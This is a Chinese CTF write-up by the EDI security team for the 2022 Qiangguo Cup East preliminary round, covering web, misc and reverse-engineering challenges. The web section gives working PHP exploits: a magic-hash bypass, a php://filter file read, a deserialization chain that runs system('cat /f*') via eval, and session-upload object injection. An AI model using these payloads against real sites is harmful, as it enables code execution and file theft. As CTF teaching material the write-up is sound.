2022强国杯东部 初赛CTF-WriteUp

admin 2022年10月18日08:29:36评论84 views字数 4091阅读13分38秒阅读模式

秀米社团

JOIN US ▶▶▶

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。

诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Web

1

md5_php
GET /?md5=0e215962017 HTTP/1.1Host: 39.106.153.217:46975Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
http://39.106.153.217:46975/le.php?file=php://filter/convert.base64-encode/index/resource=flag

2

命令执行
https://www.xiaohongyan.cn/articles/2022/04/27/1651046661350.html
2022强国杯东部 初赛CTF-WriteUp


2022强国杯东部 初赛CTF-WriteUp


3

反序列化
<?phpclass main{    protected $ClassObj;
function __construct(){ $this->ClassObj = new evil();    }}// class easy{// function action(){// echo "hello Hacker";// }// }class evil{ private $file= 'system("cat /f*");'; function action(){ eval($this->file); }}$a = new main();echo urlencode(serialize($a));http://101.200.32.152:16798/?a=O%3A4%3A%22main%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00file%22%3Bs%3A18%3A%22system%28%22cat+%2Ff%2A%22%29%3B%22%3B%7D%7D

2022强国杯东部 初赛CTF-WriteUp

4

phpti

php自增

<?phperror_reporting(0);highlight_string(file_get_contents('sessionti1.php'));class a{    public $uname;    public $password;    public function __construct($uname,$password){        $this->uname=$uname;        $this->password=$password;    }    public function __wakeup(){        if($this->password==='admin')        {        highlight_string(file_get_contents('flag.php'));            include('flag.php');        }        else        {            echo 'hacker !!!';        }    }}
function filter($string){ return str_replace('phpinfo()','phpinfo()up',$string);}
$uname=$_GET["admin"];$password=123456;$ser=filter(serialize(new a($uname,$password)));var_dump($ser);// $ser=filter(serialize(new a($uname,$password)));// $test=unserialize($ser);?>
<!-- O:1:"a":2:{s:5:"uname";s:1:"?";s:8:"password";s:5:"admin";} -->1=phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()";s:8:"password";s:5:"admin";}http://39.107.81.36:45787/sessionti1.php?admin=phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()%22;s:8:%22password%22;s:5:%22admin%22;}https://www.jb51.net/article/241817.htmhttps://blog.csdn.net/bmth666/article/details/104737025
<form action="http://39.107.81.36:45787/flag.php" method="POST" enctype="multipart/form-data">    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />    <input type="file" name="file" />    <input type="submit" /></form>POST /flag.php HTTP/1.1Host: 39.107.81.36:45787User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:83.1) Gecko/20100101 Firefox/83.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------169043664136240902353881690649Content-Length: 500Origin: nullConnection: closeCookie: PHPSESSID=ufikfl87kj719o80l9nfrhd2fqUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1-----------------------------169043664136240902353881690649Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
123-----------------------------169043664136240902353881690649Content-Disposition: form-data; name="file"; filename="|O:5:"admin":1:{s:4:"root";s:36:"print_r(scandir(dirname(__FILE__)));";}"Content-Type: image/png塒NG

02

Misc

1

不要被迷惑

binwalk拿到zip,然后爆破密码 jjdecode解密

2022强国杯东部 初赛CTF-WriteUp

2

PCAP文件分析

09.pacapng

分离flag.zip 和09.png 09.png为zip密码 解密后

crc段出现问题,修改文件高看到flag

2022强国杯东部 初赛CTF-WriteUp

2022强国杯东部 初赛CTF-WriteUp

3

平正开

还原zip , zip伪加密

dd = open('12.zip','wb')f1 = open('flag44c099db1.zip','rb')for l in f1.read():    if l == 0:        dd.write(bytes([0x0]))    else:        dd.write(bytes([0x100-l]))dd.close()
然后 http://www.hiencode.com/cvencode.html 解码

2022强国杯东部 初赛CTF-WriteUp

03

Re

1

re2
反编译exe后反编译pyc文件
2022强国杯东部 初赛CTF-WriteUp
分数达到1000就是flag
2022强国杯东部 初赛CTF-WriteUp
score = 0 后直接吐出flag

2022强国杯东部 初赛CTF-WriteUp


EDI安全

2022强国杯东部 初赛CTF-WriteUp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号



原文始发于微信公众号(EDI安全):2022强国杯东部 初赛CTF-WriteUp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月18日08:29:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2022强国杯东部 初赛CTF-WriteUphttps://cn-sec.com/archives/1355069.html

发表评论

匿名网友 填写信息